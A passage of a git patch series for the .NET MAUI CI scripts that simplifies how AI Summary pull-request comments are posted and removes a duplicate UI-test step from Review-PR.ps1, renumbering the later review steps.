- $sha = $match.Groups[1].Value - $sessions[$sha] = $match.Value - } - - # Replace or prepend new session - $sessions[$CommitSha7] = $NewSession - - # Rebuild: newest session first (the one we just added/replaced) - $orderedKeys = @($CommitSha7) + @($sessions.Keys | Where-Object { $_ -ne $CommitSha7 }) - - $allSessions = @() - $isFirst = $true - foreach ($sha in $orderedKeys) { - $block = $sessions[$sha] - if ($isFirst) { - # Ensure ONLY the outer (session-wrapping) details tag is open. Inner - # phase tags must keep their original open/collapsed state — we used - # to re-open all of them via a global regex replace, which forced - # every phase to expand on each new session. - $rx = [regex]::new('') - $block = $rx.Replace($block, '
', 1) - $isFirst = $false - } else { - # Collapse the outer details of older sessions; leave inner phases alone. - $rx = [regex]::new('') - $block = $rx.Replace($block, '
', 1) - } - $allSessions += $block - } - - return ($allSessions -join "`n`n---`n`n") -} - # ============================================================================ # FIND EXISTING COMMENT & BUILD FINAL BODY # ============================================================================ Write-Host "Checking for existing review comment..." -ForegroundColor Yellow -$existingBody = $null $existingCommentIds = @() +$existingBodies = @() $existingRaw = gh api "repos/dotnet/maui/issues/$PRNumber/comments" --paginate 2>$null if ($existingRaw) { @@ -262,7 +209,6 @@ if ($existingRaw) { if ($existingObjs.Count -gt 0) { $existingCommentIds = @($existingObjs | ForEach-Object { $_.id }) $existingBodies = @($existingObjs | ForEach-Object { [string]$_.body }) - $existingBody = $existingBodies -join "`n`n---`n`n" Write-Host "✓ Found existing AI Summary comment(s): $($existingCommentIds -join ', ')" -ForegroundColor Green } } catch { @@ -286,32 +232,15 @@ if ($existingBodies -and $existingBodies.Count -gt 0) { } } -if ($existingBody) { - # Merge new session into all existing AI Summary bodies before deleting the - # old comments. This keeps prior session history even if retries created - # multiple generated comments. - $mergedSessions = Merge-Sessions -ExistingBody $existingBody -NewSession $newSessionBlock -CommitSha7 $commitSha7 - - $commentBody = @" -$MARKER - -## 🤖 AI Summary - -$authorPing - -$mergedSessions$finalizeSection -"@ -} else { - $commentBody = @" +$commentBody = @" $MARKER ## 🤖 AI Summary $authorPing -$newSessionBlock +$newSessionBlock$finalizeSection "@ -} # Clean up excessive blank lines $commentBody = $commentBody -replace "`n{4,}", "`n`n`n" From 3650971cff6b6c097ea3c61e7e728a6cbb0c6203 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Thu, 28 May 2026 10:36:28 +0200 Subject: [PATCH 15/34] Remove duplicate full-category UI test run from ReviewPR stage MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Step 3 (Run Detected UI Tests) was running BuildAndRunHostApp.ps1 per detected category inside the ReviewPR stage, duplicating the same work that RunDeepUITests (Stage 2) does. This caused UI tests to run twice. Now the ReviewPR stage only runs targeted PR-specific tests via the Gate (verify-tests-fail.ps1), and full-category runs happen exclusively in the RunDeepUITests stage. Renumbered steps: old 4→3, 5→4, 6→5, 7→6, 8→7. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Review-PR.ps1 | 539 +++------------------------------- 1 file changed, 39 insertions(+), 500 deletions(-) diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index cb39a45faf59..c966ce7d9218 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -7,13 +7,15 @@ Step 1: Branch setup - Create review branch from main, merge PR squashed Step 2: Detect UI categories - Run eng/scripts/detect-ui-test-categories.ps1 (info only) - Step 3: Run detected UI tests - Execute BuildAndRunHostApp.ps1 per detected category (informational) - Step 4: Regression cross-ref - Run Find-RegressionRisks.ps1 + run any tests from prior fix PRs - Step 5: Gate - Run test verification directly (verify-tests-fail.ps1) - Step 6: Multi-candidate review - Pre-Flight, then PARALLEL (expert-reviewer eval of PR + Try-Fix×4), + Step 3: Regression cross-ref - Run Find-RegressionRisks.ps1 + run any tests from prior fix PRs + Step 4: Gate - Run test verification directly (verify-tests-fail.ps1) + Step 5: Multi-candidate review - Pre-Flight, then PARALLEL (expert-reviewer eval of PR + Try-Fix×4), then Report compares all candidates and writes winner.json - Step 7: Post AI Summary - Directly runs posting scripts - Step 8: Apply labels - Apply agent labels based on review results + Step 6: Post AI Summary - Directly runs posting scripts + Step 7: Apply labels - Apply agent labels based on review results + + NOTE: Full-category UI test runs happen in the RunDeepUITests stage (ci-copilot.yml Stage 2), + not here. This script only runs targeted PR-specific tests in the Gate (Step 4). By default, the script checks out main and creates a review branch from it. If squash-merge conflicts, the script posts a comment on the PR and exits. @@ -395,8 +397,8 @@ if ($Phase -and $Phase -ne 'Setup') { # ─── Helper: Parse `dotnet test --logger "console;verbosity=detailed"` ────── # Extracts per-test results (Passed/Failed/Skipped) plus failure messages and -# stack traces from raw stdout. Used by STEP 3 so the AI summary comment shows -# WHICH tests failed and WHY, not just an aggregate exit code. +# stack traces from raw stdout. Used by the RunDeepUITests stage and Gate so the +# AI summary comment shows WHICH tests failed and WHY, not just an aggregate exit code. function Get-DotNetTestResults { param([string[]]$Lines) @@ -476,7 +478,7 @@ function Get-DotNetTestResults { # --logger "trx;LogFileName=.trx" --results-directory # The TRX is the same format AzDO's PublishTestResults@2 ingests, so it has # every test's outcome, duration, error message and stack trace — without -# any console-scrape ambiguity. STEP 3 prefers TRX when available because +# any console-scrape ambiguity. The RunDeepUITests stage and Gate prefer TRX when # parsing console output is fragile when many tests run, lines wrap, or # multi-line ErrorRecords get glued together by PowerShell stream merging. # Get-TrxResults: defined inline because Review-PR.ps1 is invoked by @@ -812,458 +814,12 @@ if ($LASTEXITCODE -ne 0) { } # ═════════════════════════════════════════════════════════════════════════════ -# STEP 3: RUN DETECTED UI TEST CATEGORIES (script, no copilot agent) +# STEP 3: REGRESSION CROSS-REFERENCE (script, no copilot agent) # ═════════════════════════════════════════════════════════════════════════════ -# Runs the UI test categories that Step 2 detected. Skipped when: -# - $uitestCategories is 'NONE' (no UI-relevant changes) -# - $uitestCategories is empty/blank (run-all matrix — too expensive locally) -# Results are appended to the existing uitests/content.md so they show up in -# the same collapsible section of the AI summary comment. Write-Host "" Write-Host "╔═══════════════════════════════════════════════════════════╗" -ForegroundColor Cyan -Write-Host "║ STEP 3: RUN DETECTED UI TESTS ║" -ForegroundColor Cyan -Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Cyan - -$uitestRunResult = "SKIPPED" -$uitestRunnerScript = Join-Path $ScriptsDir "BuildAndRunHostApp.ps1" - -if ($uitestCategories -eq 'NONE') { - Write-Host " ⏭️ Skipped — detection returned NONE (no UI-relevant changes)" -ForegroundColor DarkGray -} elseif ([string]::IsNullOrWhiteSpace($uitestCategories)) { - Write-Host " ⏭️ Skipped — detection returned the run-all matrix (too expensive to run all categories locally)" -ForegroundColor DarkGray -} elseif (-not (Test-Path $uitestRunnerScript)) { - Write-Host " ⚠️ BuildAndRunHostApp.ps1 not found — cannot run UI tests" -ForegroundColor Yellow -} else { - # Mirror the regression-test platform fallback so a $Platform-less invocation - # still has a concrete target instead of silently picking nothing. - $uitestPlatform = if ($Platform) { $Platform } else { "android" } - - $categoryList = @($uitestCategories -split ',' | ForEach-Object { $_.Trim() } | Where-Object { $_ }) - Write-Host " 🧪 Running $($categoryList.Count) detected UI category(ies) on '$uitestPlatform'…" -ForegroundColor Cyan - - $uitestRunOutputDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/uitests" - New-Item -ItemType Directory -Force -Path $uitestRunOutputDir | Out-Null - - $uitestPassed = 0 - $uitestFailed = 0 - $uitestSkipped = 0 - $uitestDetails = @() - - foreach ($cat in $categoryList) { - Write-Host "" - Write-Host " 📋 [$cat] Invoke-UITestWithRetry -Platform $uitestPlatform -Category $cat" -ForegroundColor Cyan - - # Delegate to the shared deploy+retry script so STEP 3 uses the - # SAME pre-boot + retry-on-env-error + device-reboot pipeline as - # the Gate (verify-tests-fail.ps1's Invoke-TestRun + - # Invoke-TestRunWithRetry). When the Android emulator/iOS sim - # rejects an install ("ADB0010 Broken pipe", XHarness exit 83, - # AppiumServerHasNotBeenStartedLocally, …) the helper retries up - # to 3 times with adb reboot / simctl boot recovery between - # attempts. Without this, a single transient install failure was - # turning into "119 OneTimeSetUp timeouts" in the AI summary. - $catLogPath = Join-Path $uitestRunOutputDir ("$cat-output.log") - $catStart = Get-Date - $sharedRunner = Join-Path $ScriptsDir "shared/Invoke-UITestWithRetry.ps1" - $runResult = $null - $testOutput = @() - $testExitCode = -1 - $envErrHit = $null - try { - $runResult = Invoke-WithoutGhTokens { & $sharedRunner ` - -Platform $uitestPlatform ` - -Category $cat ` - -RepoRoot $RepoRoot ` - -LogFile $catLogPath - } - if ($runResult) { - $testOutput = $runResult.Output - $testExitCode = $runResult.ExitCode - $envErrHit = $runResult.EnvErrorHit - Write-Host " Attempts: $($runResult.Attempts) · Exit: $testExitCode · EnvError: $envErrHit" -ForegroundColor Gray - $testOutput | Select-Object -Last 20 | ForEach-Object { Write-Host " $_" } - } - } catch { - Write-Host " ⚠️ Shared runner threw: $_" -ForegroundColor Yellow - $testExitCode = -1 - } - $catDuration = [math]::Round(((Get-Date) - $catStart).TotalSeconds, 1) - - # Parse per-test results. We prefer the TRX file written by - # `dotnet test --logger trx` (mirrors CI pipeline 313's - # `RunTestWithLocalDotNet`) — it's authoritative because it captures - # every test's outcome, duration, error and stack regardless of - # how the console output got wrapped or interleaved. We only fall - # back to scraping the captured stdout via Get-DotNetTestResults - # when the TRX is missing (build/deploy crashed before tests ran, - # or an older BuildAndRunHostApp.ps1 ran without --logger trx). - $perTestResults = @() - $trxAggregate = $null - $trxPath = if ($runResult) { [string]$runResult.TrxResultFile } else { $null } - if ($trxPath -and (Test-Path $trxPath)) { - try { - $trxAggregate = Get-TrxResults -TrxPath $trxPath - if ($trxAggregate) { - $perTestResults = @($trxAggregate.Results) - Write-Host " 📄 TRX parsed: total=$($trxAggregate.Total) passed=$($trxAggregate.Passed) failed=$($trxAggregate.Failed) skipped=$($trxAggregate.Skipped)" -ForegroundColor Cyan - } - } catch { - Write-Host " ⚠️ Failed to parse TRX $trxPath : $_" -ForegroundColor Yellow - } - } - if (-not $trxAggregate) { - try { - $perTestResults = @(Get-DotNetTestResults -Lines $testOutput) - } catch { - Write-Host " ⚠️ Failed to parse per-test results: $_" -ForegroundColor Yellow - } - } - $catFailedTests = @($perTestResults | Where-Object { $_.status -eq 'Failed' }) - $catPassedTests = @($perTestResults | Where-Object { $_.status -eq 'Passed' }) - # Authoritative aggregate counts: TRX > per-test array. (When the TRX - # is present its attribute beats counting - # array items because VSTest may report retries/skips that aren't in - # individual nodes.) - if ($trxAggregate) { - $catTotalCount = [int]$trxAggregate.Total - $catPassedCount = [int]$trxAggregate.Passed - $catFailedCount = [int]$trxAggregate.Failed - } else { - $catTotalCount = $perTestResults.Count - $catPassedCount = $catPassedTests.Count - $catFailedCount = $catFailedTests.Count - } - - if ($testExitCode -eq 0) { - Write-Host " ✅ PASSED ($catDuration s, $catPassedCount test(s))" -ForegroundColor Green - $uitestPassed++ - $uitestDetails += @{ - category = $cat - result = 'PASSED' - duration_s = $catDuration - tests_total = $catTotalCount - tests_passed = $catPassedCount - tests_failed = 0 - passed_tests = @($catPassedTests | ForEach-Object { @{ name = $_.name; duration = $_.duration } }) - failed_tests = @() - } - } elseif ($testExitCode -eq -1) { - Write-Host " ⏭️ SKIPPED" -ForegroundColor DarkGray - $uitestSkipped++ - $uitestDetails += @{ - category = $cat - result = 'SKIPPED' - duration_s = $catDuration - reason = 'Runner threw an exception' - tests_total = 0 - tests_passed = 0 - tests_failed = 0 - passed_tests = @() - failed_tests = @() - } - } else { - Write-Host " ❌ FAILED (exit code: $testExitCode, $catDuration s, $catFailedCount failed test(s))" -ForegroundColor Red - foreach ($ft in $catFailedTests) { - Write-Host " • $($ft.name)" -ForegroundColor Red - } - $uitestFailed++ - # When per-test parsing found no failures (e.g. build/deploy - # crashed before tests ran), capture the last 30 lines of the - # category's stdout so the AI summary can show the actual error - # (CS0246, RS0016, missing dependency, etc.) instead of just - # "exit code 1". - $buildTail = $null - if ($catFailedCount -eq 0) { - try { - $tail = @($testOutput | ForEach-Object { "$_" } | Select-Object -Last 30) - $buildTail = ($tail -join "`n").Trim() - } catch { $buildTail = $null } - } - # Detect infrastructure-level failure: when ALL failures share a - # OneTimeSetUp timeout AND the build log shows the HostApp couldn't - # be installed/launched (ADB install failure, broken pipe, no - # device, etc.), this is a CI infra problem — not real test - # regressions. Reviewers shouldn't be alarmed by "119 failed tests" - # when the app never even started. - # - # If $envErrHit was set above, use that — the retry loop already - # detected an env error and exhausted retries. - # Load shared env-error patterns (single source of truth). - $sharedPatternsScript = Join-Path $ScriptsDir "shared/Get-EnvErrorPatterns.ps1" - if (Test-Path $sharedPatternsScript) { - . $sharedPatternsScript - $infraSignals = Get-EnvErrorPatterns - } else { - $infraSignals = @( - 'InstallFailedException', - 'Failure calling service package', - 'ADB0010', - 'Broken pipe', - 'no devices/emulators found', - 'device offline', - 'Could not connect to device', - 'Failed to launch the application', - 'cmd: Failure' - ) - } - $infraReason = $envErrHit - if (-not $infraReason -and $catFailedTests.Count -gt 0) { - # Two equally-strong infra-failure indicators: - # (a) every failure is `OneTimeSetUp:` — driver couldn't - # reach the runner UI button. - # (b) the build itself failed (`Build FAILED`) and there - # are zero passes — NUnit then "fails" every test in - # the assembly because the HostApp APK never got - # installed. - $logText = ($testOutput | ForEach-Object { "$_" }) -join "`n" - $allOneTimeSetup = @($catFailedTests | Where-Object { - ($_.error -as [string]) -match '^OneTimeSetUp:' - }).Count -eq $catFailedTests.Count - $buildFailedNoPasses = ($catPassedCount -eq 0) -and ($logText -match '(?m)^Build FAILED\.\s*$') - if ($allOneTimeSetup -or $buildFailedNoPasses) { - foreach ($sig in $infraSignals) { - if ($logText -match $sig) { - $infraReason = $sig - break - } - } - } - } - $uitestDetails += @{ - category = $cat - result = 'FAILED' - duration_s = $catDuration - exit_code = $testExitCode - tests_total = $catTotalCount - tests_passed = $catPassedCount - tests_failed = $catFailedCount - build_tail = $buildTail - infra_failure = $infraReason - trx_path = $trxPath - passed_tests = @($catPassedTests | ForEach-Object { @{ name = $_.name; duration = $_.duration } }) - failed_tests = @($catFailedTests | ForEach-Object { - @{ - name = $_.name - duration = $_.duration - error = $_.error - stack = $_.stack - } - }) - } - } - } - - if ($uitestFailed -gt 0) { - $uitestRunResult = "FAILED" - Write-Host "" - Write-Host " 🔴 UI test result: $uitestPassed passed, $uitestFailed FAILED, $uitestSkipped skipped" -ForegroundColor Red - } elseif ($uitestPassed -gt 0) { - $uitestRunResult = "PASSED" - Write-Host "" - Write-Host " ✅ UI test result: $uitestPassed passed, $uitestSkipped skipped" -ForegroundColor Green - } else { - $uitestRunResult = "SKIPPED" - Write-Host "" - Write-Host " ⏭️ All UI categories skipped ($uitestSkipped total)" -ForegroundColor DarkGray - } - - # Append a results table to the existing uitests/content.md so the same - # collapsible "UI Tests — Category Detection" section in the AI summary - # comment now contains both the detected list and the run results. - $uitestContentFile = Join-Path $uitestRunOutputDir "content.md" - $appendMd = New-Object System.Text.StringBuilder - [void]$appendMd.AppendLine() - [void]$appendMd.AppendLine("### 🧪 UI Test Execution Results") - [void]$appendMd.AppendLine() - $resultIcon = switch ($uitestRunResult) { "PASSED" { "✅" }; "FAILED" { "❌" }; default { "⏭️" } } - [void]$appendMd.AppendLine("$resultIcon **$uitestRunResult** — $uitestPassed passed, $uitestFailed failed, $uitestSkipped skipped (platform: ``$uitestPlatform``)") - [void]$appendMd.AppendLine() - if ($uitestDetails.Count -gt 0) { - [void]$appendMd.AppendLine("| Category | Result | Tests | Duration | Notes |") - [void]$appendMd.AppendLine("|---|---|---|---|---|") - foreach ($d in $uitestDetails) { - $icon = switch ($d.result) { "PASSED" { "✅" }; "FAILED" { "❌" }; default { "⏭️" } } - # Tests column: e.g. "1/1 ✓" on pass, "0/1 (1 ❌)" on fail. When the - # category itself failed but no per-test failures were parsed (e.g. - # build/deploy crashed before tests ran), don't claim a green ✓ — - # show "build/deploy failed" so reviewers aren't misled. - $tCount = if ($null -ne $d.tests_total) { [int]$d.tests_total } else { 0 } - $tPass = if ($null -ne $d.tests_passed) { [int]$d.tests_passed } else { 0 } - $tFail = if ($null -ne $d.tests_failed) { [int]$d.tests_failed } else { 0 } - $testsCol = if ($d.infra_failure) { - "🛠️ infra failure ($tFail bogus failures)" - } - elseif ($d.result -eq 'FAILED' -and $tFail -eq 0) { - if ($tCount -eq 0) { "build/deploy failed" } - else { "$tPass/$tCount — build/deploy failed before per-test results" } - } - elseif ($tCount -eq 0) { "—" } - elseif ($tFail -gt 0) { "$tPass/$tCount ($tFail ❌)" } - else { "$tPass/$tCount ✓" } - $notes = if ($d.infra_failure) { "infra: $($d.infra_failure)" } - elseif ($d.exit_code) { "exit code $($d.exit_code)" } - elseif ($d.reason) { $d.reason } - else { "" } - [void]$appendMd.AppendLine("| ``$($d.category)`` | $icon $($d.result) | $testsCol | $($d.duration_s)s | $notes |") - } - } - [void]$appendMd.AppendLine() - - # Per-failed-category breakdown: collapsible block with each failed test's - # name, error message, and first stack frame so a reviewer can diagnose - # without downloading the full build artifact. When a category failed but - # produced no per-test failures (build/deploy crashed), surface the last - # 30 lines of stdout so the AI summary still pinpoints the cause. - $failedCats = @($uitestDetails | Where-Object { $_.result -eq 'FAILED' -and (($_.failed_tests -and $_.failed_tests.Count -gt 0) -or $_.build_tail) }) - $infraCats = @($failedCats | Where-Object { $_.infra_failure }) - if ($infraCats.Count -gt 0) { - [void]$appendMd.AppendLine("> ⚠️ **Infrastructure failure detected** — for $($infraCats.Count) categor$(if ($infraCats.Count -eq 1) { 'y' } else { 'ies' }) below, the HostApp couldn't be installed or launched on the device (build/deploy failed). NUnit then reports every test in the assembly as failed. **These are NOT real test regressions** — the test runner never started. Look for ``$($infraCats[0].infra_failure)`` in the build log.") - [void]$appendMd.AppendLine() - } - if ($failedCats.Count -gt 0) { - [void]$appendMd.AppendLine("#### Failed test details") - [void]$appendMd.AppendLine() - foreach ($d in $failedCats) { - $hasFailedTests = $d.failed_tests -and $d.failed_tests.Count -gt 0 - $headSummary = if ($d.infra_failure) { - "🛠️ $($d.category) — infra failure ($($d.failed_tests.Count) bogus failures, app never installed)" - } elseif ($hasFailedTests) { - "❌ $($d.category) — $($d.failed_tests.Count) failed test$(if ($d.failed_tests.Count -ne 1) { 's' })" - } else { - "❌ $($d.category) — build/deploy failed (no per-test results)" - } - [void]$appendMd.AppendLine("
$headSummary") - [void]$appendMd.AppendLine() - if ($hasFailedTests) { - # GitHub's comment body limit is 65,536 chars; large categories - # can have 100+ failures with multi-KB error messages each. - # Group by error message to dedup the common "OneTimeSetUp: - # Timed out…" cases (one root cause, N tests). Show full - # detail for the first 5 unique errors, then a compact list. - # @() wrap is required: Group-Object on a single unique key - # returns ONE GroupInfo (not an array), and `.Count` on a - # GroupInfo returns the size of the group, not the number of - # groups — without @() the foreach below would iterate the - # group's members instead of the groups themselves. - $byErr = @($d.failed_tests | Group-Object -Property { - if ($_.error) { ($_.error -as [string]).Substring(0, [Math]::Min(200, ([string]$_.error).Length)) } else { '' } - } | Sort-Object Count -Descending) - - $shownGroups = 0 - foreach ($g in $byErr) { - if ($shownGroups -ge 5) { - $remaining = ($byErr | Select-Object -Skip 5 | Measure-Object -Property Count -Sum).Sum - [void]$appendMd.AppendLine("…and $remaining more failure(s) with other error signatures (see CopilotLogs artifact for full detail).") - [void]$appendMd.AppendLine() - break - } - $shownGroups++ - - $first = $g.Group[0] - $count = $g.Count - if ($count -gt 1) { - $sampleNames = ($g.Group | Select-Object -First 3 | ForEach-Object { "``$($_.name)``" }) -join ', ' - $more = if ($count -gt 3) { ", … (+$($count - 3) more)" } else { '' } - [void]$appendMd.AppendLine("**$count tests failed with the same error** — e.g. $sampleNames$more") - } else { - [void]$appendMd.AppendLine("**``$($first.name)``** *(took $($first.duration))*") - } - [void]$appendMd.AppendLine() - - $errBody = if ($first.error) { - $e = [string]$first.error - if ($e.Length -gt 1500) { $e.Substring(0, 1500) + "`n…(truncated)" } else { $e } - } else { "_(no error message captured)_" } - [void]$appendMd.AppendLine('```') - [void]$appendMd.AppendLine($errBody) - [void]$appendMd.AppendLine('```') - if ($first.stack) { - $firstFrame = ($first.stack -split "`n" | Where-Object { $_.Trim() } | Select-Object -First 1) - if ($firstFrame) { - [void]$appendMd.AppendLine("> at $($firstFrame.Trim().TrimStart('a','t',' '))") - [void]$appendMd.AppendLine() - } - } - } - - # Always print a compact name-only list of every failed test - # so reviewers know exactly which tests need to be re-run, - # even if their error matched a deduped group above. - if ($d.failed_tests.Count -gt 1) { - [void]$appendMd.AppendLine("
All $($d.failed_tests.Count) failed test names") - [void]$appendMd.AppendLine() - foreach ($ft in $d.failed_tests) { - [void]$appendMd.AppendLine("- ``$($ft.name)``") - } - [void]$appendMd.AppendLine() - [void]$appendMd.AppendLine("
") - [void]$appendMd.AppendLine() - } - } - if ($d.build_tail) { - $tail = [string]$d.build_tail - if ($tail.Length -gt 3000) { $tail = $tail.Substring($tail.Length - 3000) } - [void]$appendMd.AppendLine("Last 30 lines of build/test stdout:") - [void]$appendMd.AppendLine() - [void]$appendMd.AppendLine('```') - [void]$appendMd.AppendLine($tail) - [void]$appendMd.AppendLine('```') - } - [void]$appendMd.AppendLine() - [void]$appendMd.AppendLine("
") - [void]$appendMd.AppendLine() - } - } - - # Per-passed-category mini-summary: only emitted if there were ANY passed - # tests, so empty/skipped runs stay quiet. - $passedCats = @($uitestDetails | Where-Object { $_.passed_tests -and $_.passed_tests.Count -gt 0 -and $_.result -eq 'PASSED' }) - if ($passedCats.Count -gt 0) { - [void]$appendMd.AppendLine("
Show $(($passedCats | Measure-Object -Property tests_passed -Sum).Sum) passed test name(s)") - [void]$appendMd.AppendLine() - foreach ($d in $passedCats) { - [void]$appendMd.AppendLine("**``$($d.category)``**") - [void]$appendMd.AppendLine() - foreach ($pt in $d.passed_tests) { - [void]$appendMd.AppendLine("- ``$($pt.name)`` *($($pt.duration))*") - } - [void]$appendMd.AppendLine() - } - [void]$appendMd.AppendLine("
") - [void]$appendMd.AppendLine() - } - [void]$appendMd.AppendLine("_Failures here are informational only — they do not block the gate or affect try-fix candidate scoring._") - Add-Content $uitestContentFile $appendMd.ToString() -Encoding UTF8 - - # JSON summary for downstream consumers / debugging. - @{ - result = $uitestRunResult - platform = $uitestPlatform - passed = $uitestPassed - failed = $uitestFailed - skipped = $uitestSkipped - details = $uitestDetails - } | ConvertTo-Json -Depth 4 | Set-Content (Join-Path $uitestRunOutputDir "test-results.json") -Encoding UTF8 - - # result.txt — one-line traceability marker (PASSED / FAILED / SKIPPED). - $uitestRunResult | Set-Content (Join-Path $uitestRunOutputDir "result.txt") -Encoding UTF8 -} - -# Restore the review branch in case BuildAndRunHostApp.ps1 (or any of its -# child invocations) detached HEAD or switched branches. -git checkout $reviewBranch 2>$null | Out-Null -if ($LASTEXITCODE -ne 0) { - Write-Host " ⚠️ Failed to restore review branch '$reviewBranch' after Step 3 — subsequent steps may run against the wrong tree" -ForegroundColor Red -} - -# ═════════════════════════════════════════════════════════════════════════════ -# STEP 4: REGRESSION CROSS-REFERENCE (script, no copilot agent) -# ═════════════════════════════════════════════════════════════════════════════ - -Write-Host "" -Write-Host "╔═══════════════════════════════════════════════════════════╗" -ForegroundColor Cyan -Write-Host "║ STEP 4: REGRESSION CROSS-REFERENCE ║" -ForegroundColor Cyan +Write-Host "║ STEP 3: REGRESSION CROSS-REFERENCE ║" -ForegroundColor Cyan Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Cyan $regressionOutputDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/regression-check" @@ -1291,7 +847,7 @@ if (Test-Path $regressionScript) { Write-Host " ⚠️ Find-RegressionRisks.ps1 not found" -ForegroundColor Yellow } -# --- Regression Test Execution (part of STEP 4) --- +# --- Regression Test Execution (part of STEP 3) --- $regressionTestResult = "SKIPPED" $regressionRisksJson = Join-Path $regressionOutputDir "risks.json" if (Test-Path $regressionRisksJson) { @@ -1447,13 +1003,13 @@ if ($risksData -and ($risksData.result -eq 'REVERT' -or $risksData.result -eq 'O } # ═════════════════════════════════════════════════════════════════════════════ -# STEP 5: Gate - Test Before and After Fix (script, no copilot agent) +# STEP 4: Gate - Test Before and After Fix (script, no copilot agent) # ═════════════════════════════════════════════════════════════════════════════ -# TEMP: Skip Gate (STEP 5) + Try-Fix (STEP 6) for fast iteration on the +# TEMP: Skip Gate (STEP 4) + Try-Fix (STEP 5) for fast iteration on the # inline-stages architecture. Both phases are expensive (build the whole -# repo, run agents on multiple candidates) and we just need STEPs 1-4 + -# STEP 7 (post comment) to validate that detectedCategories / +# repo, run agents on multiple candidates) and we just need STEPs 1-3 + +# STEP 6 (post comment) to validate that detectedCategories / # aiSummaryCommentId output variables flow through to the new # RunDeepUITests + UpdateAISummaryComment stages. Flip $skipGateAndTryFix # back to $false (or delete the wrapper) once the new pipeline stages @@ -1463,7 +1019,7 @@ if (-not $skipGateAndTryFix) { Write-Host "" Write-Host "╔═══════════════════════════════════════════════════════════╗" -ForegroundColor Yellow -Write-Host "║ STEP 5: GATE — TEST VERIFICATION ║" -ForegroundColor Yellow +Write-Host "║ STEP 4: GATE — TEST VERIFICATION ║" -ForegroundColor Yellow Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Yellow $gateOutputDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/gate" @@ -1790,7 +1346,7 @@ if ($Phase -eq 'CopilotReview') { git checkout $reviewBranch 2>$null | Out-Null # ═════════════════════════════════════════════════════════════════════════════ -# STEP 6: PR Review (3-phase skill: Pre-Flight, Try-Fix, Report) +# STEP 5: PR Review (3-phase skill: Pre-Flight, Try-Fix, Report) # ═════════════════════════════════════════════════════════════════════════════ $gateStatusForPrompt = switch ($gateResult) { @@ -1825,8 +1381,8 @@ Run these AFTER your primary test command succeeds. If any regression test fails } } -# ── STEP 6a: Try-Fix — iterative candidate generation (Copilot call 1) ──── -$step6aPrompt = @" +# ── STEP 5a: Try-Fix — iterative candidate generation (Copilot call 1) ──── +$step5aPrompt = @" Generate alternative fix candidates for PR #$PRNumber using an iterative expert-review-and-test loop. ## Phase 1 — Pre-Flight (context only) @@ -1860,14 +1416,14 @@ Do NOT re-run gate verification. The gate phase is handled separately. ⚠️ Do NOT create or overwrite ``gate/content.md`` — it is already generated by the gate script with detailed test output. "@ -Invoke-CopilotStep -StepName "STEP 6a: TRY-FIX" -Prompt $step6aPrompt | Out-Null +Invoke-CopilotStep -StepName "STEP 5a: TRY-FIX" -Prompt $step5aPrompt | Out-Null # Restore review branch between copilot calls git checkout $reviewBranch 2>$null | Out-Null -# Diagnostic: check what STEP 6a produced +# Diagnostic: check what STEP 5a produced Write-Host "" -Write-Host " 📊 STEP 6a output check:" -ForegroundColor Cyan +Write-Host " 📊 STEP 5a output check:" -ForegroundColor Cyan $tryFixDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent" $tryFixContent = Join-Path $tryFixDir "try-fix/content.md" $preFlightContent = Join-Path $tryFixDir "pre-flight/content.md" @@ -1890,9 +1446,9 @@ if ($tryFixDirs) { Write-Host " ⚠️ No try-fix-N directories found" -ForegroundColor Yellow } -# ── STEP 6b: Expert Review of PR fix + final comparison (Copilot call 2) ── -$step6bPrompt = @" -Run expert code review of PR #$PRNumber's fix and compare against all try-fix candidates from STEP 6a. +# ── STEP 5b: Expert Review of PR fix + final comparison (Copilot call 2) ── +$step5bPrompt = @" +Run expert code review of PR #$PRNumber's fix and compare against all try-fix candidates from STEP 5a. Read context from: - ``CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/pre-flight/content.md`` @@ -1907,7 +1463,7 @@ Use the code-review skill with the maui-expert-reviewer agent to evaluate the PR Compare ALL candidates: - ``pr`` (the raw PR fix as submitted) - ``pr-plus-reviewer`` (PR fix + expert reviewer feedback applied) -- All ``try-fix-N`` candidates from STEP 6a +- All ``try-fix-N`` candidates from STEP 5a Pick the single winning candidate. **Candidates that failed regression tests MUST be ranked lower than candidates that passed them.** Write the comparative analysis to ``CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/report/content.md``. @@ -1934,11 +1490,11 @@ $autonomousRules Do NOT re-run gate verification. "@ -Invoke-CopilotStep -StepName "STEP 6b: EXPERT REVIEW + COMPARE" -Prompt $step6bPrompt | Out-Null +Invoke-CopilotStep -StepName "STEP 5b: EXPERT REVIEW + COMPARE" -Prompt $step5bPrompt | Out-Null -# Diagnostic: check what STEP 6b produced +# Diagnostic: check what STEP 5b produced Write-Host "" -Write-Host " 📊 STEP 6b output check:" -ForegroundColor Cyan +Write-Host " 📊 STEP 5b output check:" -ForegroundColor Cyan $expertEvalContent = Join-Path $tryFixDir "expert-pr-eval/content.md" $reportContent = Join-Path $tryFixDir "report/content.md" $winnerFile = Join-Path $tryFixDir "winner.json" @@ -1973,8 +1529,8 @@ git checkout $reviewBranch 2>$null | Out-Null # ─── Tier 3 refresh: feed AI categories back into category detection ─── # Step 2 ran detection without the AI tier (-AiCategories was empty). -# Pre-flight (Step 6) wrote `ai-categories.md`; re-run detection now so the -# unified comment reflects all three tiers before Step 7 posts. +# Pre-flight (Step 5) wrote `ai-categories.md`; re-run detection now so the +# unified comment reflects all three tiers before Step 6 posts. $aiCategoriesFile = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/uitests/ai-categories.md" if ($detectScript -and (Test-Path $detectScript) -and (Test-Path $aiCategoriesFile)) { try { @@ 